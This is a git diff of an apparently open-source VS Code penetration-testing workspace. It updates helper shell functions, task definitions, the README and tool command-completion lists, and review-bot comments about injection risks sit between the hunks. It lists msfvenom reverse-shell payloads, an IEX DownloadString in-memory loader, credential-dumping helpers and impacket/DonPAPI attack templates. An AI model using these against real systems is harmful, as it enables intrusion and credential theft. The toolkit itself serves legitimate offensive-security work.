+ return 1 + fi + else + echo "usage: $0 password" + fi +} + +function dump_hosts() { + for host in $(env|grep -E '^HOST_'|grep -v 'HOST_ALIAS'); do + local _var=$(echo $host|sed -e 's/HOST_//g' | cut -d '=' -f1) # replace _ with - to get the original hostname + local _ip=$(eval echo '$IP_'$_var) + local _hostname=$(eval echo '$HOST_'$_var) + local aliases=$(env | grep -E "^HOST_ALIAS_${_var}_" |cut -d '=' -f2 | tr '\n' ' ') + echo "${_ip} ${_hostname} ${aliases}" + done +} + +function dump_users() { + echo "dumping impacket format for users:" + for user in $(env|grep -E '^USER_'|grep -v 'USER_ALIAS'); do + local _var=$(echo $user|sed -e 's/USER_//g' | cut -d '=' -f1) # replace _ with - to get the original username + local _user=$(eval echo '$USER_'$_var) + local _pass=$(eval echo '$PASS_'$_var) + local _nt_hash=$(eval echo '$NT_HASH_'$_var) + local _login=$(eval echo '$LOGIN_'$_var) + if [[ "$_login" == "$_user" ]]; then + _login=$DOMAIN + fi + if [[ "$_nt_hash" == "fffffffffffffffffffffffffffffffffff" ]]; then + echo "\"${_login}\"/\"${_user}\":'${_pass}' (No NT Hash)" + else + echo "\"${_login}\"/\"${_user}\" (${_nt_hash})" + fi + done + echo "" + echo "# dumping environment variables for users:" + for user in $(env|grep -E '^USER_'|grep -v 'USER_ALIAS'); do + local _var=$(echo $user|sed -e 's/USER_//g' | cut -d '=' -f1) + local _user=$(eval echo '$USER_'$_var) + echo "# user: $_user" + local _pass=$(eval echo '$PASS_'$_var) + local _nt_hash=$(eval echo '$NT_HASH_'$_var) + local _login=$(eval echo '$LOGIN_'$_var) + echo "export USER_${_var}=\"${_user}\"" + echo "export PASS_${_var}=\"${_pass}\"" + echo "export NT_HASH_${_var}=\"${_nt_hash}\"" + echo "export LOGIN_${_var}=\"${_login}\"" + done + echo "" + echo "# dumping current user environment variables:" + echo "export USER=${CURRENT_USER}" + echo "export USERNAME=${CURRENT_PASS}" + echo "export PASS=${CURRENT_PASS}" + echo "export PASSWORD=${CURRENT_PASS}" + echo "export NT_HASH=${CURRENT_NT_HASH}" + echo 
"export LOGIN=${CURRENT_LOGIN}" + echo "" + echo "export CURRENT_USER=${CURRENT_USER}" + echo "export CURRENT_PASS=${CURRENT_PASS}" + echo "export CURRENT_NT_HASH=${CURRENT_NT_HASH}" + echo "export CURRENT_LOGIN=${CURRENT_LOGIN}" + echo "export CURRENT=${CURRENT}" +} + +function differ() { + if [[ -z $1 || -z $2 ]]; then + echo "Usage: differ " + return 1 + fi + if [[ ! -f $1 || ! -f $2 ]]; then + echo "File not found!" + return 1 + fi + code -d "$1" "$2" } diff --git a/.vscode/extensions.json b/.vscode/extensions.json index 8c2bad2..5262c5b 100644 --- a/.vscode/extensions.json +++ b/.vscode/extensions.json @@ -6,14 +6,12 @@ // remote controls "ms-vscode-remote.remote-ssh", // remote ssh controller "ms-kubernetes-tools.vscode-kubernetes-tools", // Kubernetes Control - // documents and file read helper "foam.foam-vscode", // double linked knowledge base for showing the relationship in targets in actions "redhat.vscode-xml", // xml formatter "redhat.vscode-yaml", // yaml formatter "euskadi31.json-pretty-printer", // json pretty printer "ryu1kn.edit-with-shell", // Edit file or selection with any shell command like sort -rn or uniq - //////////////////////////////////////////////////////////////// // Language supports //////////////////////////////////////////////////////////////// @@ -21,10 +19,10 @@ "icsharpcode.ilspy-vscode", // c# decompiler // Python "ms-python.python", // ms python supports - "donjayamanne.python-environment-manager", // python environment/packages manager + "ms-python.vscode-python-envs", // python environment/packages manager // Golang "golang.go", // golang support - + "foxundermoon.shell-format", // shell formatter //////////////////////////////////////////////////////////////// // Protocol supports //////////////////////////////////////////////////////////////// 
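Review bot: In the new `ntlm` function the password is spliced into the Python source text (`"'$1'".encode(...)`), so a password containing `"` or `\` either fails to hash or changes the program that runs. Passing it as an argument keeps it as data: `python3 -c 'import hashlib,sys; print(hashlib.new("md4", sys.argv[1].encode("utf-16le")).hexdigest())' "$1"`. In `dump_users`, the line `echo "export USERNAME=${CURRENT_PASS}"` emits the password under the `USERNAME` name; it should read `echo "export USERNAME=${CURRENT_USER}"`. `dump_hosts` and `dump_users` also reach their values through `eval echo '$USER_'$_var`, so they inherit whatever characters ended up in the exported variable names.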
@@ -35,7 +33,6 @@ // "rpdswtk.vsmqtt", // MQTT support // "Dancheg97.grpc-clicker", // gRPC support "cweijan.vscode-office", // documents support + http request sender - //////////////////////////////////////////////////////////////// // Custom Favorites //////////////////////////////////////////////////////////////// @@ -43,4 +40,4 @@ "ms-vscode-remote.vscode-remote-extensionpack" // remote extension pack // "mhutchie.git-graph", // git graph ] -} \ No newline at end of file +} diff --git a/.vscode/settings.json b/.vscode/settings.json index 38c7dc5..067a269 100644 --- a/.vscode/settings.json +++ b/.vscode/settings.json @@ -2,9 +2,10 @@ "terminal.integrated.profiles.linux": { "zsh-shell": { "env": { - "PROJECT_FOLDER": "${workspaceFolder}" + "PROJECT_FOLDER": "${workspaceFolder}", + "SHOW_CURRENT_STATUS": "True" }, - "path": "zsh", + "path": "zsh" }, "meterpreter-handler": { "overrideName": true, @@ -12,7 +13,7 @@ "PROJECT_FOLDER": "${workspaceFolder}", "METASPLOIT_HANDLER_MODE": "True" }, - "path": "zsh", + "path": "zsh" }, "msfconsole": { "overrideName": true, @@ -20,7 +21,7 @@ "PROJECT_FOLDER": "${workspaceFolder}", "METASPLOIT_CONSOLE_MODE": "True" }, - "path": "zsh", + "path": "zsh" }, "netcat-handler": { "overrideName": true, @@ -28,7 +29,7 @@ "PROJECT_FOLDER": "${workspaceFolder}", "REVERSE_SHELL_MODE": "True" }, - "path": "zsh", + "path": "zsh" }, "web-delivery": { "overrideName": true, @@ -36,15 +37,16 @@ "PROJECT_FOLDER": "${workspaceFolder}", "WEB_DELIVERY_MODE": "True" }, - "path": "zsh", - }, + "path": "zsh" + } }, "terminal.integrated.profiles.osx": { "zsh-shell": { "env": { - "PROJECT_FOLDER": "${workspaceFolder}" + "PROJECT_FOLDER": "${workspaceFolder}", + "SHOW_CURRENT_STATUS": "True" }, - "path": "zsh", + "path": "zsh" }, "meterpreter-handler": { "overrideName": true, @@ -52,7 +54,7 @@ "PROJECT_FOLDER": "${workspaceFolder}", "METASPLOIT_HANDLER_MODE": "True" }, - "path": "zsh", + "path": "zsh" }, "msfconsole": { "overrideName": true, 
@@ -60,7 +62,7 @@ "PROJECT_FOLDER": "${workspaceFolder}", "METASPLOIT_CONSOLE_MODE": "True" }, - "path": "zsh", + "path": "zsh" }, "netcat-handler": { "overrideName": true, @@ -68,7 +70,7 @@ "PROJECT_FOLDER": "${workspaceFolder}", "REVERSE_SHELL_MODE": "True" }, - "path": "zsh", + "path": "zsh" }, "web-delivery": { "overrideName": true, @@ -76,7 +78,7 @@ "PROJECT_FOLDER": "${workspaceFolder}", "WEB_DELIVERY_MODE": "True" }, - "path": "zsh", + "path": "zsh" }, "kali-orbstack": { "overrideName": true, @@ -93,10 +95,10 @@ "terminal.integrated.defaultProfile.osx": "zsh-shell", "terminal.integrated.defaultProfile.linux": "zsh-shell", "terminal.integrated.automationProfile.osx": { - "path": "zsh", + "path": "zsh" }, "terminal.integrated.automationProfile.linux": { - "path": "zsh", + "path": "zsh" }, "files.associations": { "*.nuclei": "yaml" @@ -104,7 +106,7 @@ "yaml.schemas": { "https://raw.githubusercontent.com/projectdiscovery/nuclei/main/nuclei-jsonschema.json": [ "*.nuclei", - "*nuclei.yaml", + "*nuclei.yaml" ] - }, + } } \ No newline at end of file diff --git a/.vscode/tasks.json b/.vscode/tasks.json index bb9cbb7..999301b 100644 --- a/.vscode/tasks.json +++ b/.vscode/tasks.json @@ -2,7 +2,7 @@ "version": "2.0.0", "options": { "env": { - "PROJECT_FOLDER": "${workspaceFolder}", + "PROJECT_FOLDER": "${workspaceFolder}" } }, "tasks": [ @@ -12,7 +12,7 @@ "detail": "msfvenom payload creating task", "problemMatcher": [], "command": [ - "source ${workspaceFolder}/.vscode/.zshrc;", // source shell config + "source ${workspaceFolder}/.vscode/.zshrc;", "msfvenom", "-p", "${input:msfvenom-payload}", 
@@ -57,32 +57,15 @@ "command": [ "source ${workspaceFolder}/.vscode/.zshrc;", "echo '================ ADDING THIS LINE IN FILE ========';", - "echo ${RHOST} ${DOMAIN};", + "dump_hosts;", "echo '================================================';", - "sudo", - "vim", - "/etc/hosts" + "echo 'Press Enter key to continue';", + "read;", + "sudo vim /etc/hosts" ], "isBackground": false, "problemMatcher": [] }, - { - "label": "Encoder/Decoder", - "command": [ - "${input:visit-cyberchef}" - ], - "problemMatcher": [] - }, - { - "label": "OSCP exam style note template", - "type": "shell", - "detail": "OSCP exam style note template task, you can use this to create a note file for the exam or other lab.", - "command": [ - "echo ${input:note-template-type}|base64 -d > ${input:note-filename}", - "\n# fileSource: https://github.com/0prrr/OSCP-Note-Template", - ], - "problemMatcher": [] - }, { "label": "service account token kubeconfig generation", "type": "shell", @@ -129,17 +112,27 @@ "-- ${input:nmap-args}" ], "problemMatcher": [] + }, + { + "label": "run command with selection", + "type": "shell", + "detail": "Run command with selection in the terminal", + "command": [ + "source ${workspaceFolder}/.vscode/.zshrc; ", + "echo 'Running command with selection:';", + "echo 'Press Enter key to continue or Ctrl-C to cancal';", + "read;", + "${selectedText}" + ], + "problemMatcher": [] } ], "inputs": [ - // msfvenom { "id": "msfvenom-payload", "type": "pickString", "description": "Select the payload", "options": [ - // Order with the most used payloads first - // Staged first, better stageless "windows/x64/meterpreter/reverse_tcp", "windows/meterpreter/reverse_tcp", "linux/x64/meterpreter/reverse_tcp", @@ -150,7 +143,7 @@ "windows/x64/meterpreter/reverse_http", "windows/meterpreter/reverse_https", "windows/x64/meterpreter/reverse_https", - "java/meterpreter/reverse_tcp", + "java/meterpreter/reverse_tcp" ] }, { 
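Review bot: In the new "run command with selection" task the confirmation is blind: the two `echo` lines never print the selection, so the operator presses Enter without seeing what `${selectedText}` will expand to. VS Code substitutes that variable into the shell line as raw text, so anything highlighted runs as shell syntax, including output pasted into notes from a remote host. Consider passing the selection through the task's `options.env` (for example `"SELECTED_CMD": "${selectedText}"`, a constructed name) and showing it with `printf '%s\n' "$SELECTED_CMD";` before `read;`. The prompt string also has a typo, `cancal` for `cancel`. The enclosing `tasks` and `inputs` arrays continue outside this hunk.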
@@ -158,8 +151,6 @@ "type": "pickString", "description": "Select the format of the payload", "options": [ - // executable first, script second, web hta third - // "# DONOT Choose this.(psh is powershell script with loader,raw is used for python java php pyloads)", "exe", "elf", "psh # psh is powershell payload with loader using `IEX(New-Object System.Net.WebClient).DownloadString('http://YOURIP:80/.ps1');` to load in memory ", @@ -183,20 +174,20 @@ "vba", "vba-exe", "vba-psh", - "vbs", + "vbs" ] }, { "id": "msfvenom-lhost", "type": "promptString", "description": "Enter the LHOST, default will read the env.zsh configurated variable $LHOST", - "default": "$LHOST", + "default": "$LHOST" }, { "id": "msfvenom-lport", "type": "promptString", "description": "Enter the LPORT", - "default": "6789", + "default": "6789" }, { "id": "msfvenom-payload-advanced-options", 
@@ -208,51 +199,31 @@ "PrependMigrate=true PrependMigrateProc=explorer.exe", "PrependFork=true", "PrependSetuid=true", - "PrependSetuid=true PrependFork=true", + "PrependSetuid=true PrependFork=true" ] }, { "id": "msfvenom-output", "type": "promptString", "description": "Enter the output filename. if you put /dev/stdout here, the output will be printed to the terminal", - "default": "${workspaceFolder}/trojan", - }, - // note-templates - { - "id": "note-template-type", - "type": "pickString", - "description": "Select the note template type. First one is Linux, Second one is Windows", - "options": [ - "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", - "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" - ] + "default": "${workspaceFolder}/trojan" }, { "id": "note-filename", "type": "promptString", "description": "Enter the note filename", - "default": "${workspaceFolder}/note.md", - }, - // cyberchef url - { - "id": "visit-cyberchef", - "type": "command", - "command": "simpleBrowser.show", - "args": [ - "https://gchq.github.io/CyberChef/" - ] + "default": "${workspaceFolder}/note.md" }, - // kubeconfig creator { "id": "kubeconfig-gen-api-server", "type": "promptString", "description": "kubernetes api server", - "default": "https://server-ip:6443", + "default": "https://server-ip:6443" }, { "id": "kubeconfig-gen-sa-token", "type": "promptString", - "description": "kubernetes service account token under /var/run/secrets/kubernetes.io/serviceaccount/token", + "description": "kubernetes service account token under /var/run/secrets/kubernetes.io/serviceaccount/token" }, { "id": "kubeconfig-gen-namespace", @@ -260,7 +231,6 @@ "description": "kubernetes service account namespace", "default": "default" }, - // python version picker { "id": "python-versioned", "type": "pickString", @@ -271,11 +241,10 @@ "python3.10", "python3.11", "python3.12", - "python", + "python" ], "default": "python" }, - // Hashcat { "id": "hashcat-mode", "type": "pickString", 
@@ -286,7 +255,7 @@ "$HASHCAT_MODE_TOGGLE_CASE", "$HASHCAT_MODE_MASK_BRUTE_FORCE", "$HASHCAT_MODE_WORDLIST_MASK", - "$HASHCAT_MODE_MASK_WORDLIST", + "$HASHCAT_MODE_MASK_WORDLIST" ], "default": "$HASHCAT_MODE_WORDLIST" }, @@ -297,7 +266,7 @@ "options": [ "$HASHCAT_DEVICE_CPU", "$HASHCAT_DEVICE_GPU", - "$HASHCAT_DEVICE_FPGA", + "$HASHCAT_DEVICE_FPGA" ], "default": "$HASHCAT_DEVICE_GPU" }, @@ -326,9 +295,9 @@ "$HASH_KRB5_TGS_17", "$HASH_KRB5_TGS_18", "$HASH_JWT", - "$HASH_KRB5_AS_REP_23", + "$HASH_KRB5_AS_REP_23" ], - "default": "$HASH_MD5", + "default": "$HASH_MD5" }, { "id": "hashcat-hashfile", diff --git a/Makefile b/Makefile new file mode 100644 index 0000000..0c348b1 --- /dev/null +++ b/Makefile @@ -0,0 +1,18 @@ +build: + @echo "Building the project..." + uv run ./craft.py + uv run ./completion_creator.py + @echo "Build complete." + +install: build + @echo "Preparing the environment..." + WEAPON_LOCATION=$(shell pwd)/weapon_test ./installer.sh + @echo "Installation complete." + +install-trace: build + @echo "Preparing the environment with trace..." + WEAPON_LOCATION=$(shell pwd)/weapon_test ./installer.sh --trace-mode + @echo "Installation with trace complete." + +clean: + rm -rf ./hosts ./users ./weapon_test ./createhackenv.sh ./zsh_history \ No newline at end of file diff --git a/README.md b/README.md index d931133..b6a6639 100644 --- a/README.md +++ b/README.md 
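Review bot: None of the targets in the new Makefile is declared phony, so a file or directory named `build`, `install` or `clean` in the repository root would make `make` treat that target as up to date and silently skip it; add `.PHONY: build install install-trace clean`. The `install` and `install-trace` recipes also pass `$(shell pwd)` unquoted, which breaks when the checkout path contains spaces; `WEAPON_LOCATION="$(CURDIR)/weapon_test" ./installer.sh` avoids both the extra shell call and the splitting. A one-line comment above `clean` saying that it removes the generated `hosts` and `users` directories would help, since in created projects directories with those names hold notes and credentials.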
@@ -1,69 +1,305 @@ -## Create Hacking Environment +# WeaponizedVSCode -### USAGE +A lightweight penetration testing environment management tool based on Visual Studio Code, designed for cybersecurity professionals and penetration testers. -[Usage Readme](./documents/USE.md) +## 🎯 Project Goals -[Custom Readme](./documents/CUSTOM.md) +WeaponizedVSCode aims to solve the following problems in traditional penetration testing: -[Demo](./documents/DEMO.md) +1. **Difficult Environment Switching** - Frequent switching between different project environment configurations +2. **Chaotic Tool Management** - Tools and payloads scattered across different directories +3. **Repetitive Configuration** - Each project requires reconfiguring Metasploit, reverse shells, etc. +4. **Scattered Records** - Credentials, notes, and files stored dispersedly +5. **Low Efficiency** - Lack of mechanisms for rapid payload generation -### AIM of project (which problem this project try to solve) +## ✨ Core Features -Cobalt Strike has a lot of features, but it's too heavy for only host machine or boxes. But it's inspired me a lot. +### 🔄 Project Environment Management +- **One-Click Project Environment Creation** - Use `createhack ` to quickly create pre-configured penetration testing projects +- **Smart Environment Switching** - Seamless switching between different projects with automatic configuration loading +- **Template-Based Configuration** - Pre-configured VSCode settings, tasks, and extension configurations -So I wanna create a lightweight hacking environment for myself and providing features like following: +### 🛠️ Integrated Tool Support +- **300+ Security Tool Integration** - Pre-configured command completion for common penetration testing tools +- **Smart Command History** - Tool index-based command history and auto-completion +- **Environment Variable Management** - Automatic detection and management of tool-dependent environment variables -1. 
different enviroment in different hacking project - content switching +### 🎮 Multi-Mode Terminals +- **Standard Shell** - Enhanced Zsh terminal with status display +- **Meterpreter Handler** - Auto-configured Metasploit listener +- **MSF Console** - Pre-configured Metasploit console +- **Netcat Handler** - Reverse shell handling terminal +- **Web Delivery** - HTTP server mode for file transfer +- **Kali OrbStack** - Virtual machine integration support (macOS) - > such as, you play #hackthebox machine and #tryhackme machine at the same time, and you have to switch the different environment for them. - > - > you will cost a lot time on switching the environment, and you will forget to switch the environment sometimes although you have a note for it. +### 📋 Project Organization Features +- **Structured Directories** - Automatically create hosts, users, credentials directories +- **File Management** - Convenient project file and web transfer file management +- **Note System** - Integrated Foam extension with bidirectional linked notes +- **Credential Management** - Centralized management of discovered user credentials -2. enviroments collections. put things about projects together. 
- save and clean +### ⚡ Quick Operations +- **Payload Generation** - VSCode task integration for rapid Msfvenom payload generation +- **Automated Scanning** - Integration of RustScan, Nmap, and other scanning tools +- **Proxy Management** - Convenient proxy switching and configuration +- **Host Management** - Automatic /etc/hosts file updates - > such as, you have a #hackthebox machine and you put all the tools together in a arsenal - > - > Now you need craft some payload and delivery it to the target machine - > - > before: you need to switch the environment to the arsenal folder , compile payloads and start a server(maybe http server or jndi server) to delivery the payload - > - > that compile will make the arsenal folder dirty, and you need to clean it up before you commit it to git - > - > and what you compile is useless for other projects which also need this payload - > - > if you want copy the payload back to the project folder, you need to find the project folder again and copy the path. - > - > now: you can create $PROJECT_WEB_DELIVERY for the payload and delivery it to the target machine, and you can easliy move the payload to $PROJECT_WEB_DELIVERY and delivery it to the target machine. also you save the payload for this project and you can use it again and keep the arsenal folder clean. +## 🔧 System Requirements -3. customized metaspoit rcfile for different projects +### Supported Platforms +- **Linux** (Recommended) +- **macOS** +- **Windows** (Partial functionality, not fully supported) - > such as, you have a #hackthebox machine and you want create a handler fastly. when your machine is resetting and recover the reverse shell again. - > - > now: you can edit the rcfile for project and use it in vscode terminal with `metasploit` mode. send trigger again and get the shell. +### Required Dependencies +```bash +# Core Tools +zsh # Shell environment +code # Visual Studio Code +python3 # Python runtime +vim # Editor -4. 
taking notes, log/save credentials, download files from remote machine and keep them tidy +# Network Tools +nc # Netcat +rlwrap # Command line wrapper - it works well with vscode. so you can use some vscode extensions and vscode features to do sth. +# Parsing Tools +awk, sed, grep, tr # Text processing tools +yq # YAML processor - like ssh with vscode or port fortwarding with vscode +# Security Tools +msfvenom # Metasploit payload generator +rustscan # Port scanner +wfuzz # Web fuzzing tool +hashcat # Password cracking tool +``` - > such as, you have a #hackthebox machine and you want to save the credentials you found in the machine. - > - > now: you can create a file named `cred` and save the credentials in it. `user` folder to save context with getting foothold and to user. `root` folder to save context with getting root. - > - > also I recommand using Foam in extensions.json to take notes and save the notes in the project folder. you can use the notes to write the report after you get the goal. you can use double linked like [[USE]] to go to the doucment use.md. - > +### Recommended Tools +```bash +simplehttpserver # Enhanced HTTP server +uv # Python package manager (performance optimization) +``` -5. fast payload generation with metasploit +## 🚀 Installation Guide - > such as, you have a #hackthebox machine and you want to craft a payload for it. - > - > now: you can use vscode tasks in vscode to generate the payload fastly. - > - > +### 1. Clone Repository +```bash +git clone https://github.com/Esonhugh/WeaponizedVSCode.git +cd WeaponizedVSCode +``` -6. more feature ... +### 2. Build Project +```bash +# Build using Make (recommended) +make build +# Or build manually +uv run ./craft.py +uv run ./completion_creator.py +``` -### Happy hacking. ;) +### 3. 
Install to System +```bash +# Default installation (installs to ~/.local/weapon) +./installer.sh + +# Custom installation location +WEAPON_LOCATION=/your/custom/path ./installer.sh + +# Force reinstallation +./installer.sh --force-install + +# Enable performance tracing mode +./installer.sh --trace-mode +``` + +### 4. Verify Installation +```bash +# Check script integrity +python3 verify.py createhackenv.sh + +# Reload shell configuration +source ~/.zshrc +``` + +## 📖 Usage + +### Create New Project +```bash +# Create new penetration testing project +createhack my-project +# Or use alias +createhackenv my-project +``` + +### Environment Variable Configuration +Set environment variables in the project's `.vscode/env.zsh` file: +```bash +export RHOST="10.10.10.1" +export RPORT="4444" +export LHOST="10.10.14.1" +export LPORT="9001" +export DOMAIN="target.com" +``` + +### Terminal Mode Usage + +#### 1. Standard Shell Mode +- Automatically load project environment variables +- Display current status information +- Support all tool command completion + +#### 2. Meterpreter Handler Mode +```bash +# Select "meterpreter-handler" terminal profile in VSCode +# Automatically start configured Metasploit listener +``` + +#### 3. 
Web Delivery Mode +```bash +# Select "web-delivery" terminal profile in VSCode +# Automatically switch to $PROJECT_WEB_DELIVERY directory and start HTTP server +``` + +### Common Command Examples +```bash +# Host Management +set_current_host 10.10.10.1 +dump_hosts | sudo tee -a /etc/hosts + +# User Management +set_current_user administrator +update_user_cred_to_env + +# Scanning Operations +rustscan -a $RHOST --ulimit 5000 -- -A --script=vuln +nmap -sC -sV -p 139,445,80,21 $RHOST + +# Proxy Management +proxys on +proxys set http://127.0.0.1:8080 + +# File Operations +cp payload.exe $PROJECT_WEB_DELIVERY/ +``` + +## 🏗️ Project Structure + +``` +WeaponizedVSCode/ +├── craft.py # Environment build script +├── completion_creator.py # Command completion generator +├── installer.sh # Installation script +├── verify.py # Script verification tool +├── launch_helper.zsh # Shell launch helper +├── Makefile # Build configuration +├── .vscode/ # VSCode template configuration +│ ├── settings.json # Editor settings +│ ├── tasks.json # Task configuration +│ ├── extensions.json # Recommended extensions +│ ├── env.zsh # Environment variables +│ ├── metasploit_handler.rc # MSF configuration +│ └── source_*.zsh # Mode launch scripts +├── completion_indexer/ # Tool command index +│ ├── nmap # Nmap command set +│ ├── burpsuite # Burp Suite command set +│ ├── metasploit # Metasploit command set +│ ├── _weapon # Built-in tool commands +│ └── ... # 300+ tool command sets +└── documents/ # Project documentation + ├── USE.md # Usage instructions + ├── CUSTOM.md # Customization guide + └── DEMO.md # Demo documentation +``` + +### Created Project Structure +``` +my-project/ +├── .vscode/ # VSCode configuration +│ ├── .zshrc # Shell configuration +│ ├── env.zsh # Environment variables +│ └── ... 
# Other configuration files +├── hosts/ # Host information +├── users/ # User information +├── credentials/ # Credential information +└── web-delivery/ # Web transfer files +``` + +## 🎨 Custom Configuration + +### Modify Templates +1. Edit configuration files in the `.vscode/` directory +2. Run `python3 craft.py` to regenerate installation script +3. Commit changes to Git repository + +### Add New Tools +1. Create new tool command files in the `completion_indexer/` directory +2. Run `python3 completion_creator.py` to update command index +3. Rebuild and install + +### Environment Variable Check +```bash +# Check all used environment variables +python3 completion_creator.py +``` + +## 🔍 Troubleshooting + +### Common Issues + +#### 1. Command Completion Not Working +```bash +# Check if zsh_history file exists +ls -la ~/.local/weapon/zsh_history + +# Regenerate command index +python3 completion_creator.py +``` + +#### 2. Metasploit Mode Cannot Start +```bash +# Check if Metasploit is properly installed +which msfconsole +msfconsole --version + +# Check RC file +cat .vscode/metasploit_handler.rc +``` + +#### 3. Environment Variables Not Loading Correctly +```bash +# Check project environment variable file +source .vscode/env.zsh +echo $PROJECT_FOLDER +``` + +## 🤝 Contributing + +1. Fork this repository +2. Create a feature branch (`git checkout -b feature/AmazingFeature`) +3. Commit your changes (`git commit -m 'Add some AmazingFeature'`) +4. Push to the branch (`git push origin feature/AmazingFeature`) +5. Create a Pull Request + +## 📄 License + +This project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details. 
+ +## 🙏 Acknowledgments + +- Inspired by Cobalt Strike's environment management concepts +- Thanks to all security tool developers for their contributions +- Thanks to the VSCode community for providing a powerful extension ecosystem + +## 📞 Support + +- **GitHub Issues**: [Report Issues](https://github.com/Esonhugh/WeaponizedVSCode/issues) +- **Author**: Esonhugh + +--- + +**Happy Hacking! 🎯** + + ## 404Starlink + +WeaponizedVSCode has joined [404Starlink](https://github.com/knownsec/404StarLink) diff --git a/README2.md b/README2.md new file mode 100644 index 0000000..d931133 --- /dev/null +++ b/README2.md 
@@ -0,0 +1,69 @@ +## Create Hacking Environment + +### USAGE + +[Usage Readme](./documents/USE.md) + +[Custom Readme](./documents/CUSTOM.md) + +[Demo](./documents/DEMO.md) + +### AIM of project (which problem this project try to solve) + +Cobalt Strike has a lot of features, but it's too heavy for only host machine or boxes. But it's inspired me a lot. + +So I wanna create a lightweight hacking environment for myself and providing features like following: + +1. different enviroment in different hacking project - content switching + + > such as, you play #hackthebox machine and #tryhackme machine at the same time, and you have to switch the different environment for them. + > + > you will cost a lot time on switching the environment, and you will forget to switch the environment sometimes although you have a note for it. + +2. enviroments collections. put things about projects together. - save and clean + + > such as, you have a #hackthebox machine and you put all the tools together in a arsenal + > + > Now you need craft some payload and delivery it to the target machine + > + > before: you need to switch the environment to the arsenal folder , compile payloads and start a server(maybe http server or jndi server) to delivery the payload + > + > that compile will make the arsenal folder dirty, and you need to clean it up before you commit it to git + > + > and what you compile is useless for other projects which also need this payload + > + > if you want copy the payload back to the project folder, you need to find the project folder again and copy the path. + > + > now: you can create $PROJECT_WEB_DELIVERY for the payload and delivery it to the target machine, and you can easliy move the payload to $PROJECT_WEB_DELIVERY and delivery it to the target machine. also you save the payload for this project and you can use it again and keep the arsenal folder clean. + +3. 
customized metaspoit rcfile for different projects + + > such as, you have a #hackthebox machine and you want create a handler fastly. when your machine is resetting and recover the reverse shell again. + > + > now: you can edit the rcfile for project and use it in vscode terminal with `metasploit` mode. send trigger again and get the shell. + +4. taking notes, log/save credentials, download files from remote machine and keep them tidy + + it works well with vscode. so you can use some vscode extensions and vscode features to do sth. + + like ssh with vscode or port fortwarding with vscode + + > such as, you have a #hackthebox machine and you want to save the credentials you found in the machine. + > + > now: you can create a file named `cred` and save the credentials in it. `user` folder to save context with getting foothold and to user. `root` folder to save context with getting root. + > + > also I recommand using Foam in extensions.json to take notes and save the notes in the project folder. you can use the notes to write the report after you get the goal. you can use double linked like [[USE]] to go to the doucment use.md. + > + +5. fast payload generation with metasploit + + > such as, you have a #hackthebox machine and you want to craft a payload for it. + > + > now: you can use vscode tasks in vscode to generate the payload fastly. + > + > + +6. more feature ... + + +### Happy hacking. ;) diff --git a/completion_createor.py b/completion_creator.py similarity index 100% rename from completion_createor.py rename to completion_creator.py diff --git a/completion_indexer/_weapon b/completion_indexer/_weapon new file mode 100644 index 0000000..799ba11 --- /dev/null +++ b/completion_indexer/_weapon 
@@ -0,0 +1,27 @@ +update_user_cred_to_env +set_current_user +dump_users +update_host_to_env +set_current_host +dump_hosts +dump_hosts | sudo tee -a /etc/hosts +current_status +proxys +proxys on +proxys off +url encode "content==" +url decode "content%3D%3D" +wfuzz_vhost_http $DOMAIN $TOP_DNS +wfuzz_vhost_https $DOMAIN $TOP_DNS +venv-init +venv-activate +proxys on +proxys loc +proxys set http://127.0.0.1:8080 +rustscan -a $RHOST --ulimit 5000 -- -A --script=vuln +cp xxx $PROJECT_FOLDER/ +cp xxx $PROJECT_WEB_DELIVERY/ +cat file |url encode +cat file |url decode +ntlm $PASS +differ file1 file2 diff --git a/completion_indexer/aws b/completion_indexer/aws index d1325ca..de2d025 100644 --- a/completion_indexer/aws +++ b/completion_indexer/aws @@ -1,4 +1,4 @@ -aws configure --profile exegol +aws sts get-caller-identity aws s3 ls s3://mybucket aws s3 iam list-users aws s3 iam get-user --user-name $USER \ No newline at end of file diff --git a/completion_indexer/dirb b/completion_indexer/dirb index 63b29dc..1835cc9 100644 --- a/completion_indexer/dirb +++ b/completion_indexer/dirb @@ -1 +1 @@ -dirb "http://$TARGET" /usr/share/seclists/Discovery/Web-Content/big.txt +dirb "http://$TARGET" ${SECLIST}/Discovery/Web-Content/big.txt diff --git a/completion_indexer/dirsearch b/completion_indexer/dirsearch index 7aed1cc..545b957 100644 --- a/completion_indexer/dirsearch +++ b/completion_indexer/dirsearch @@ -1 +1 @@ -dirsearch -r -w /usr/share/wordlists/seclists/Discovery/Web-Content/quickhits.txt -u "http://$TARGET/" +dirsearch -r -w ${SECLIST}/Discovery/Web-Content/quickhits.txt -u "http://$TARGET/" \ No newline at end of file diff --git a/completion_indexer/donpapi b/completion_indexer/donpapi index cb5c7e2..4b09cc6 100644 --- a/completion_indexer/donpapi +++ b/completion_indexer/donpapi @@ -1 +1 @@ -DonPAPI "$DOMAIN"/"$USER":"$PASS"@"$TARGET" +DonPAPI "$DOMAIN"/"$USER":"$PASS"@"$RHOST" 
diff --git a/completion_indexer/impacket b/completion_indexer/impacket index d3516d2..ae3c5fa 100644 --- a/completion_indexer/impacket +++ b/completion_indexer/impacket @@ -68,6 +68,7 @@ dcomexec.py -hashes :"$NT_HASH" "$DOMAIN"/"$USER"@"$TARGET" atexec.py -hashes :"$NT_HASH" "$DOMAIN"/"$USER"@"$TARGET" changepasswd.py -newpass '123Pentest!!!' "$DOMAIN"/"$USER":"$PASS"@"$DC_HOST" changepasswd.py -newpass '123Pentest!!!' -hashes :"$NT_HASH" "$DOMAIN"/"$USER"@"$TARGET" +owneredit.py -action write -new-owner "$USER" -target "$TARGET_OBJECT" "$DOMAIN"/"$USER":"$PASS" owneredit.py -action write -new-owner "$NEW_OWNER" -target "$TARGET_OBJECT" "$DOMAIN"/"$USER":"$PASS" mssqlclient.py "$DOMAIN"/"$USER":"$PASS"@"$TARGET" describeTicket.py "$KRB5CCNAME" diff --git a/completion_indexer/john-the-ripper b/completion_indexer/john-the-ripper index 6685674..6261a5d 100644 --- a/completion_indexer/john-the-ripper +++ b/completion_indexer/john-the-ripper @@ -1,4 +1,4 @@ -john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt --fork=10 HashToPwn.txt --rules=all +john --format=NT --wordlist=$ROCKYOU --fork=10 HashToPwn.txt --rules=all john --format=krb5tgs --wordlist=`fzf-wordlists` Kerberoastables.txt john --wordlist=`fzf-wordlists` ASREProastables.txt hjohn ASREProastables.txt diff --git a/completion_indexer/smtp-user-enum b/completion_indexer/smtp-user-enum index b9a1307..dafb1c0 100644 --- 